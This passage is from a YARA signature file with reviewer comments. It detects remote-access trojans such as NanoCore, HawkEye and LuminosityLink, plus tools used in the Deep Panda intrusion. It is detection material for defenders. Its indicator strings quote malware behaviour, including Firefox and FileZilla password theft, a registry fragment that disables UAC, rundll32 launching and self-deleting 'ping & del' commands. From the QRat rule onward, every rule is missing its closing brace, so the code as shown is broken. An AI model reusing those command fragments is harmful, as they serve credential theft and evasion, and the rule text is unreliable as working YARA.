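        $s8 = "JVdJTkRJUi" fullword ascii /* base64 encoded string '%WINDIR' */
        $s20 = "btcplug" fullword ascii
    condition:
        uint16(0) == 0x5a4d and all of them
}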
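// PythoRAT: Delphi-style type names (TKeylogger, TTDownload), a "#@#@#"
// delimiter and plugin message names. $d/$e are generic but all eight are
// required. Note the identifier sequence skips $h (as in the original).
rule PythoRAT : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PythoRAT"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "TKeylogger"
        $b = "uFileTransfer"
        $c = "TTDownload"
        $d = "SETTINGS"
        $e = "Unknown" wide
        $f = "#@#@#"
        $g = "PluginData"
        $i = "OnPluginMessage"

    condition:
        all of them
}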
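// NanoCore: product/plugin names, .NET member names and an 8-byte hex
// $key. 6 of 11 required; several strings (KeepAlive, get_Connected,
// DESCrypto) are ordinary .NET names, so hits without $a/$b/$key deserve a
// second look.
rule NanoCore : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/NanoCore"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "NanoCore"
        $b = "ClientPlugin"
        $c = "ProjectData"
        $d = "DESCrypto"
        $e = "KeepAlive"
        $f = "IPNETROW"
        $g = "LogClientMessage"
        $h = "|ClientHost"
        $i = "get_Connected"
        $j = "#=q"
        $key = {43 6f 24 cb 95 30 38 39}

    condition:
        6 of them
}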
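// HawkEye keylogger: requires the product name ($key), the fixed salt
// ($salt) and all seven $string* items (wide). A strict rule; renamed
// builds that change the salt or product string will be missed.
rule HawkEye : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2015/06"
        ref = "http://malwareconfig.com/stats/HawkEye"
        maltype = "KeyLogger"
        filetype = "exe"

    strings:
        $key = "HawkEyeKeylogger" wide
        $salt = "099u787978786" wide
        $string1 = "HawkEye_Keylogger" wide
        $string2 = "holdermail.txt" wide
        $string3 = "wallet.dat" wide
        $string4 = "Keylog Records" wide
        $string5 = "<!-- do not script -->" wide
        $string6 = "\\pidloc.txt" wide
        $string7 = "BSPLIT" wide

    condition:
        $key and $salt and all of ($string*)
}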
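// Predator Pain: 7 of the 10 $string* items (e-mail exfil texts, screenshot
// and pid-file paths) plus at least one $ver* product marker. The $ver*
// requirement keeps the shared-looking strings (e.g. "\pidloc.txt", also
// used by HawkEye) from matching on their own.
rule PredatorPain : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PredatorPain"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $string1 = "holderwb.txt" wide
        $string3 = "There is a file attached to this email" wide
        $string4 = "screens\\screenshot" wide
        $string5 = "Disablelogger" wide
        $string6 = "\\pidloc.txt" wide
        $string7 = "clearie" wide
        $string8 = "clearff" wide
        $string9 = "emails should be sent to you shortly" wide
        $string10 = "jagex_cache\\regPin" wide
        $string11 = "open=Sys.exe" wide
        $ver1 = "PredatorLogger" wide
        $ver2 = "EncryptedCredentials" wide
        $ver3 = "Predator Pain" wide

    condition:
        7 of ($string*) and any of ($ver*)
}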
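// SpyGate RAT, three version branches. Branches a and b use the occurrence
// count of the "abccba" delimiter (#split > 40 / > 10) as an extra gate;
// branch c (v2.9) is purely string-based.
rule SpyGate : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/SpyGate"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $split = "abccba"
        $a1 = "abccbaSpyGateRATabccba" //$a = Version 0.2.6
        $a2 = "StubX.pdb"
        $a3 = "abccbaDanabccb"
        $b1 = "monikerString" nocase //$b = Version 2.0
        $b2 = "virustotal1"
        $b3 = "get_CurrentDomain"
        $c1 = "shutdowncomputer" wide //$c = Version 2.9
        $c2 = "shutdown -r -t 00" wide
        $c3 = "set cdaudio door closed" wide
        $c4 = "FileManagerSplit" wide
        $c5 = "Chating With >> [~Hacker~]" wide

    condition:
        (all of ($a*) and #split > 40) or (all of ($b*) and #split > 10) or (all of ($c*))
}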
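// LuxNet RAT: $a-$d are standard .NET framework names present in most
// managed binaries; $e (a cursor resource name) and $f (a "{0}|{1}|{2}"
// format string) do the discriminating. All six required.
rule LuxNet : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/LuxNet"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "GetHashCode"
        $b = "Activator"
        $c = "WebClient"
        $d = "op_Equality"
        $e = "dickcursor.cur" wide
        $f = "{0}|{1}|{2}" wide

    condition:
        all of them
}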
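// Vertex RAT: upper-case configuration key names. Each is a plain
// dictionary word, so the rule relies on all eight co-occurring
// (including PANELPATH and ROOTURL) to stay specific.
rule Vertex : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Vertex"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $string1 = "DEFPATH"
        $string2 = "HKNAME"
        $string3 = "HPORT"
        $string4 = "INSTALL"
        $string5 = "IPATH"
        $string6 = "MUTEX"
        $res1 = "PANELPATH"
        $res2 = "ROOTURL"

    condition:
        all of them
}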
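// Ap0calypse RAT: the product name plus Turkish-language member names
// (Sifre, MsgGoster, Baslik, Dosyalars, Injecsiyon). All six required.
rule Ap0calypse: RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Ap0calypse"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "Ap0calypse"
        $b = "Sifre"
        $c = "MsgGoster"
        $d = "Baslik"
        $e = "Dosyalars"
        $f = "Injecsiyon"

    condition:
        all of them
}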
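// Punisher RAT: the "abccba" delimiter shared with SpyGate, two UTF-16LE
// script paths as hex ($b decodes to "\hfh.vbs", $c to "\sc.vbs"), and the
// names of analysis tools it looks for (SpyTheSpy, wireshark, apateDNS).
// All seven required.
rule Punisher : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Punisher"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "abccba"
        $b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
        $c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
        $d = "SpyTheSpy" wide ascii
        $e = "wireshark" wide
        $f = "apateDNS" wide
        $g = "abccbaDanabccb"

    condition:
        all of them
}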
// QRat (Java): JAR entry names from the quaverse crypter. 4 of the 5 strings must
// match; $a4 (URLConnection.class) is a standard Java class name and the weakest of
// the set, so a hit should normally include $a1-$a3.
rule QRat : RAT   
   {   
       meta:   
           author = "Kevin Breen @KevTheHermit"   
           date = "2015/08"   
           ref = "http://malwareconfig.com"   
           maltype = "Remote Access Trojan"   
           filetype = "jar"   
              
       strings:   
           $a0 = "e-data"   
           $a1 = "quaverse/crypter"   
           $a2 = "Qrypt.class"   
           $a3 = "Jarizer.class"   
           $a4 = "URLConnection.class"   
              
              
       condition:   
           4 of them   
      
      
// DarkRAT: author tag ($a) plus API/.NET member names used by the client; all seven
// required.
rule DarkRAT : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/DarkRAT"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "@1906dark1996coder@"   
   		$b = "SHEmptyRecycleBinA"   
   		$c = "mciSendStringA"   
   		$d = "add_Shutdown"   
   		$e = "get_SaveMySettingsOnExit"   
   		$f = "get_SpecialDirectories"   
   		$g = "Client.My"   
      
   	condition:   
   		all of them   
// NOTE(review): this rule matches only the UPX packer's section names (UPX0, UPX1)
// and its "UPX!" marker, so every UPX-packed executable, benign or not, satisfies
// it. The ": RAT" tag is misleading; treat a hit as "packed with UPX", not as a
// RAT detection, and do not alert on it alone.
rule UPX : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
      
   	strings:   
   		$a = "UPX0"   
   		$b = "UPX1"   
   		$c = "UPX!"   
      
   	condition:   
   		all of them   
// VirusRat: twelve strings, all required. $string8/$string9 are queries against the
// Firefox login store (moz_logins / moz_disabledHosts) and $string10 a DynDNS
// updater config path — credential-theft capability indicators.
rule VirusRat : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/VirusRat"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$string0 = "virustotal"   
   		$string1 = "virusscan"   
   		$string2 = "abccba"   
   		$string3 = "pronoip"   
   		$string4 = "streamWebcam"   
   		$string5 = "DOMAIN_PASSWORD"   
   		$string6 = "Stub.Form1.resources"   
   		$string7 = "ftp://{0}@{1}" wide   
   		$string8 = "SELECT * FROM moz_logins" wide   
   		$string9 = "SELECT * FROM moz_disabledHosts" wide   
   		$string10 = "DynDNS\\Updater\\config.dyndns" wide   
   		$string11 = "|BawaneH|" wide   
      
   	condition:   
   		all of them   
// AAR RAT: .NET type/member names plus the "testmemory.FRMMain" resource name and a
// fixed GUID-like marker ($f); all seven required.
rule AAR : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/AAR"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "Hashtable"   
   		$b = "get_IsDisposed"   
   		$c = "TripleDES"   
   		$d = "testmemory.FRMMain.resources"   
   		$e = "$this.Icon" wide   
   		$f = "{11111-22222-20001-00001}" wide   
   		$g = "@@@@@"   
      
   	condition:   
   		all of them   
// Bandook RAT: command-prefix strings "aaaaaa1|".."aaaaaa5|", a drop-path format and
// the family's markers ($g-$j); all ten required.
rule Bandook : RAT   
   {   
      
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/bandook"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
       		$a = "aaaaaa1|"   
               $b = "aaaaaa2|"   
               $c = "aaaaaa3|"   
               $d = "aaaaaa4|"   
   			$e = "aaaaaa5|"   
   			$f = "%s%d.exe"   
   			$g = "astalavista"   
   			$h = "givemecache"   
   			$i = "%s\\system32\\drivers\\blogs\\*"   
   			$j = "bndk13me"   
   			   
      
              
       condition:   
       		all of them   
// PlasmaRAT: status messages for its miner, bot-killer, keylogger and DoS modules
// plus the family name; all nine required.
rule Plasma : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/Plasma"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $a = "Miner: Failed to Inject." wide   
           $b = "Started GPU Mining on:" wide   
           $c = "BK: Hard Bot Killer Ran Successfully!" wide   
           $d = "Uploaded Keylogs Successfully!" wide   
           $e = "No Slowloris Attack is Running!" wide   
           $f = "An ARME Attack is Already Running on" wide   
           $g = "Proactive Bot Killer Enabled!" wide   
           $h = "PlasmaRAT" wide ascii   
           $i = "AntiEverything" wide ascii   
      
       condition:   
           all of them   
// Infinity RAT: DPAPI/AES/flood function names and a fixed HTML resource name; all
// eight required (identifiers skip $h; cosmetic only).
rule Infinity : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Infinity"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "CRYPTPROTECT_PROMPTSTRUCT"   
   		$b = "discomouse"   
   		$c = "GetDeepInfo"   
   		$d = "AES_Encrypt"   
   		$e = "StartUDPFlood"   
   		$f = "BATScripting" wide   
   		$g = "FBqINhRdpgnqATxJ.html" wide   
   		$i = "magic_key" wide   
      
   	condition:   
   		all of them   
// BlueBanana (Java RAT). $meta ("META-INF") is present in practically every JAR and
// $conf is generic; the four obfuscated class paths ($a-$d) do the discriminating.
// All six required.
rule BlueBanana : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/BlueBanana"   
   		maltype = "Remote Access Trojan"   
   		filetype = "Java"   
      
   	strings:   
   		$meta = "META-INF"   
   		$conf = "config.txt"   
   		$a = "a/a/a/a/f.class"   
   		$b = "a/a/a/a/l.class"   
   		$c = "a/a/a/b/q.class"   
   		$d = "a/a/a/b/v.class"   
      
   		   
   	condition:   
   		all of them   
// LuminosityLink RAT: command keywords, UI messages and the family name, all wide;
// all eleven required.
rule LuminosityLink : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/LuminosityLink"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $a = "SMARTLOGS" wide   
           $b = "RUNPE" wide   
           $c = "b.Resources" wide   
           $d = "CLIENTINFO*" wide   
           $e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide   
           $f = "Proactive Anti-Malware has been manually activated!" wide   
           $g = "REMOVEGUARD" wide   
           $h = "C0n1f8" wide   
           $i = "Luminosity" wide   
           $j = "LuminosityCryptoMiner" wide   
           $k = "MANAGER*CLIENTDETAILS*" wide   
      
       condition:   
           all of them   
// Imminent Monitor RAT, two string sets for two code bases: all of $v1* OR all of
// $v2*. $v1h is UTF-16LE "RT_RCDATA" (a standard resource-type name) and only
// contributes as part of the full $v1 set.
rule Imminent : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/Imminent"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $v1a = "DecodeProductKey"   
           $v1b = "StartHTTPFlood"   
           $v1c = "CodeKey"   
           $v1d = "MESSAGEBOX"   
           $v1e = "GetFilezillaPasswords"   
           $v1f = "DataIn"   
           $v1g = "UDPzSockets"   
           $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}   // UTF-16LE "RT_RCDATA"
      
           $v2a = "<URL>k__BackingField"   
           $v2b = "<RunHidden>k__BackingField"   
           $v2c = "DownloadAndExecute"   
           $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide   
           $v2e = "england.png" wide   
           $v2f = "Showed Messagebox" wide   
       condition:   
           all of ($v1*) or all of ($v2*)   
// Sub7Nation RAT. $a is a "reg add" argument fragment that sets the UAC policy
// EnableLUA to 0; $b-$g are command markers "*A01*".."*A06*". All thirteen strings,
// including the four $verSpecific* ones, are required, so only the variant carrying
// those file names matches.
rule Sub7Nation : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Sub7Nation"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "EnableLUA /t REG_DWORD /d 0 /f"   
   		$b = "*A01*"   
   		$c = "*A02*"   
   		$d = "*A03*"   
   		$e = "*A04*"	   
   		$f = "*A05*"   
   		$g = "*A06*"   
   		$h = "#@#@#"   
   		$i = "HostSettings"   
   		$verSpecific1 = "sevane.tmp"   
   		$verSpecific2 = "cmd_.bat"   
   		$verSpecific3 = "a2b7c3d7e4"   
   		$verSpecific4 = "cmd.dll"   
      
   		   
   	condition:   
   		all of them   
// SmallNet RAT: either of two split markers ($split1/$split2) plus all three $a*
// stub strings.
rule SmallNet : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/SmallNet"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
   		   
   	strings:   
   		$split1 = "!!<3SAFIA<3!!"   
   		$split2 = "!!ElMattadorDz!!"   
   		$a1 = "stub_2.Properties"   
   		$a2 = "stub.exe" wide   
   		$a3 = "get_CurrentDomain"   
      
   	condition:   
   		($split1 or $split2) and (all of ($a*))   
// unrecom (Java RAT): JAR entry names under load/ and plugins/; all five required.
// NOTE(review): the meta block looks copy-pasted from the AAR rule — "ref" points at
// the AAR stats page and "filetype" says exe although every string is a JAR entry;
// confirm the intended reference before relying on the metadata.
rule unrecom : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/AAR"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$meta = "META-INF"   
   		$conf = "load/ID"   
   		$a = "load/JarMain.class"   
   		$b = "load/MANIFEST.MF"   
           $c = "plugins/UnrecomServer.class"   
      
   	condition:   
   		all of them   
// Arcom RAT: a key-like constant ($a1), a marker ($a2), and what appear to be
// Delphi runtime/VCL strings ($a3-$a5) plus a 4-byte sequence; all six required, so
// the generic runtime strings only narrow the compiler family.
rule Arcom : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Arcom"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
           $a1 = "CVu3388fnek3W(3ij3fkp0930di"   
           $a2 = "ZINGAWI2"   
           $a3 = "clWebLightGoldenrodYellow"   
           $a4 = "Ancestor for '%s' not found" wide   
           $a5 = "Control-C hit" wide   
           $a6 = {A3 24 25 21}   
              
       condition:   
           all of them   
// Greame RAT. $a and $b are the ASCII delimiter "####@####" wrapped around a short
// byte sequence (E8 EE E9 F9 / FA FD F0 EF F9); $g is the bare delimiter. All eight
// strings are required.
rule Greame : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Greame"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
   		   
   	strings:   
       		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}   // "####@####" + 4 bytes + "####@####"
               $b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}   // "####@####" + 5 bytes + "####@####"
               $c = "EditSvr"   
               $d = "TLoader"   
   			$e = "Stroks"   
               $f = "Avenger by NhT"   
   			$g = "####@####"   
   			$h = "GREAME"   
   			   
       condition:   
       		all of them   
// Java dropper (AlienSpy family per "ref"): requires the JAR manifest entry ($jar)
// plus one complete group of payload/config names ($a*, $b*, $c* or $d*).
// NOTE(review): "filetype" says exe but $jar is a JAR manifest path; the metadata
// looks inherited from an exe rule — confirm.
rule JavaDropper : RAT   
   {   
       meta:   
   	    author = " Kevin Breen <kevin@techanarchy.net>"   
   	    date = "2015/10"   
   	    ref = "http://malwareconfig.com/stats/AlienSpy"   
   	    maltype = "Remote Access Trojan"   
   	    filetype = "exe"   
      
       strings:   
   	    $jar = "META-INF/MANIFEST.MF"   
      
   	    $a1 = "ePK"   
   	    $a2 = "kPK"   
      
           $b1 = "config.ini"   
           $b2 = "password.ini"   
      
           $c1 = "stub/stub.dll"   
      
           $d1 = "c.dat"   
      
       condition:   
           $jar and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*))   
// LostDoor RAT, two variants: all of the $a* config markers ($a0 decodes to
// "\r\n*EDIT_SERVER*\r\n") OR all of the $b* protocol/RC4 strings.
rule LostDoor : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/LostDoor"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
       	$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}   // "\r\n*EDIT_SERVER*\r\n"
           $a1 = "*mlt* = %"   
           $a2 = "*ip* = %"   
           $a3 = "*victimo* = %"   
           $a4 = "*name* = %"   
           $b5 = "[START]"   
           $b6 = "[DATA]"   
           $b7 = "We Control Your Digital World" wide ascii   
           $b8 = "RC4Initialize" wide ascii   
           $b9 = "RC4Decrypt" wide ascii   
              
       condition:   
       	all of ($a*) or all of ($b*)   
// ParadoxRAT: family name plus module/function names (remote cam, flooders, chat);
// all seven required.
rule Paradox : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/Paradox"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "ParadoxRAT"   
   		$b = "Form1"   
   		$c = "StartRMCam"   
   		$d = "Flooders"   
   		$e = "SlowLaris"   
   		$f = "SHITEMID"   
   		$g = "set_Remote_Chat"   
      
   	condition:   
   		all of them   
// BlackNix RAT: settings marker plus command names. $a2 ("Mark Adler") is the zlib
// author credit and appears in anything that links zlib; it only matters here
// because all five strings are required.
rule BlackNix : RAT   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/BlackNix"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
              
       strings:   
   		$a1 = "SETTINGS" wide   
   		$a2 = "Mark Adler"   
   		$a3 = "Random-Number-Here"   
   		$a4 = "RemoteShell"   
   		$a5 = "SystemInfo"   
      
   	   
   	condition:   
   		all of them   
// ClientMesh / torct: credential- and keylogger-related member names plus a 10-byte
// config prefix ($conf = nine 0x00 then 0x7E, which is common padding and has little
// value on its own). All seven required.
rule ClientMesh : RAT   
   {   
       meta:   
           author = "Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/06"   
           ref = "http://malwareconfig.com/stats/ClientMesh"   
           family = "torct"   
      
       strings:   
           $string1 = "machinedetails"   
           $string2 = "MySettings"   
           $string3 = "sendftppasswords"   
           $string4 = "sendbrowserpasswords"   
           $string5 = "arma2keyMass"   
           $string6 = "keylogger"   
           $conf = {00 00 00 00 00 00 00 00 00 7E}   
      
       condition:   
           all of them   
// ShadowTech RAT: 4 of 7 strings. NOTE(review): $c ("MySettings") and $d
// ("System.Configuration") occur in ordinary .NET applications, so a hit made up of
// $b, $c, $d plus one short wide token ($split/$key) is weaker than one that includes
// $a; check which strings matched before acting on a hit.
rule ShadowTech   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/ShadowTech"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
   	strings:   
   		$a = "ShadowTech" nocase   
   		$b = "DownloadContainer"   
   		$c = "MySettings"   
   		$d = "System.Configuration"   
   		$newline = "#-@NewLine@-#" wide   
   		$split = "pSIL" wide   
   		$key = "ESIL" wide   
      
   	condition:   
   		4 of them   
// ShadowTech RAT, second signature. $string1-$string3 are the .NET metadata stream
// names (#Strings, #GUID, #Blob) found in every managed assembly; $string4/$string5
// carry the family name. The single-letter groups, e.g. "(S)hadowTech", presumably
// keep the literal text out of the rule file itself. All five required.
rule ShadowTech_2   
   {   
       meta:   
           description = "ShadowTech RAT"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $string1 = /\#(S)trings/   
           $string2 = /\#(G)UID/   
           $string3 = /\#(B)lob/   
           $string4 = /(S)hadowTech Rat\.exe/   
           $string5 = /(S)hadowTech_Rat/   
      
       condition:   
           all of them   
// https://otx.alienvault.com/pulse/564ce8824637f2388aafcc00
// Deep Panda toolset (Anthem intrusion): strings from a remote password-dump tool
// ("PwDump.exe", SAM access, named-pipe and service-creation messages). 10 of the
// 14 strings are required. Hits identify the tool, which may also be present on
// hosts where an administrator used it.
rule Anthem_DeepPanda_lot1   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"   
      
       strings:   
           $s0 = "Unable to open target process: %d, pid %d" fullword ascii   
           $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii   
           $s2 = "Target: Failed to load SAM functions." fullword ascii   
           $s5 = "Error writing the test file %s, skipping this share" fullword ascii   
           $s6 = "Failed to create service (%s/%s), error %d" fullword ascii   
           $s8 = "Service start failed: %d (%s/%s)" fullword ascii   
           $s12 = "PwDump.exe" fullword ascii   
           $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii   
           $s14 = ":\\\\.\\pipe\\%s" fullword ascii   
           $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii   
           $s16 = "dump logon session" fullword ascii   
           $s17 = "Timed out waiting to get our pipe back" fullword ascii   
           $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii   
           $s20 = "%s\\%s.exe" fullword ascii   
      
       condition:   
           10 of them   
// Deep Panda toolset: htran, a TCP relay/port-forwarding tool (usage text
// "-<listen|tran|slave>", version banner, PDB path). 10 of the 18 strings are
// required. This detects the tool itself; a hit on an unexpected host is a strong
// lateral-movement/tunnelling indicator.
rule Anthem_DeepPanda_htran_exe   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - htran-exe"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"   
      
       strings:   
           $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii   
           $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii   
           $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii   
           $s3 = "[SERVER]connection to %s:%d error" fullword ascii   
           $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
           $s5 = "[-] ERROR: Must supply logfile name." fullword ascii   
           $s6 = "[-] There is a error...Create a new connection." fullword ascii   
           $s7 = "[+] Accept a Client on port %d from %s" fullword ascii   
           $s8 = "======================== htran V%s =======================" fullword ascii   
           $s9 = "[-] Socket Listen error." fullword ascii   
           $s10 = "[-] ERROR: open logfile" fullword ascii   
           $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
           $s12 = "[+] Make a Connection to %s:%d ......" fullword ascii   
           $s14 = "Recv %5d bytes from %s:%d" fullword ascii   
           $s15 = "[+] OK! I Closed The Two Socket." fullword ascii   
           $s16 = "[+] Waiting another Client on port:%d...." fullword ascii   
           $s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii   
           $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii   
      
       condition:   
           10 of them   
// Deep Panda toolset: Foundstone ScanLine (sl.exe), a commercial command-line port
// scanner. NOTE(review): every string here belongs to the legitimate tool, so this
// rule flags the scanner wherever it is found — treat hits as a dual-use tooling
// indicator that needs context, not as malware on its own. All eight required.
rule Anthem_DeepPanda_sl_txt_packed   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"   
      
       strings:   
           $s0 = "Command line port scanner" fullword wide   
           $s1 = "sl.exe" fullword wide   
           $s2 = "CPports.txt" fullword ascii   
           $s3 = ",GET / HTTP/.}" fullword ascii   
           $s4 = "Foundstone Inc." fullword wide   
           $s9 = " 2002 Foundstone Inc." fullword wide   
           $s15 = ", Inc. 2002" fullword ascii   
           $s20 = "ICMP Time" fullword ascii   
      
       condition:   
           all of them   
// Deep Panda toolset: Trojan.Kakfum, a DLL persisting as a svchost-hosted service
// named "sqlserver" (see $s0) and dropped as sqlsrv32.dll / sqlsrv64.dll. All six
// required; two sample hashes in meta.
rule Anthem_DeepPanda_Trojan_Kakfum   
   {   
      
       meta:   
           description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"   
           author = "Florian Roth"   
           date = "2015/02/08"   
           hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"   
           hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"   
      
       strings:   
           $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii   
           $s1 = "%s\\sqlsrv32.dll" fullword ascii   
           $s2 = "%s\\sqlsrv64.dll" fullword ascii   
           $s3 = "%s\\%d.tmp" fullword ascii   
           $s4 = "ServiceMaix" fullword ascii   
           $s15 = "sqlserver" fullword ascii   
      
       condition:   
           all of them   
// Sakula v1.4: PE magic at offset 0, the three shared Sakula format strings ($m*)
// and a version-specific code sequence ($v1_4); all required.
rule sakula_v1_4: RAT   
   {   
       meta:   
           description = "Sakula v1.4"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
      
           $v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
// Sakula v1.0: same six $m* strings as the v1.1 rule; the versions are told apart
// only by the absence of "MicroPlayerUpdate.exe" ($v1_1), so a file matching this
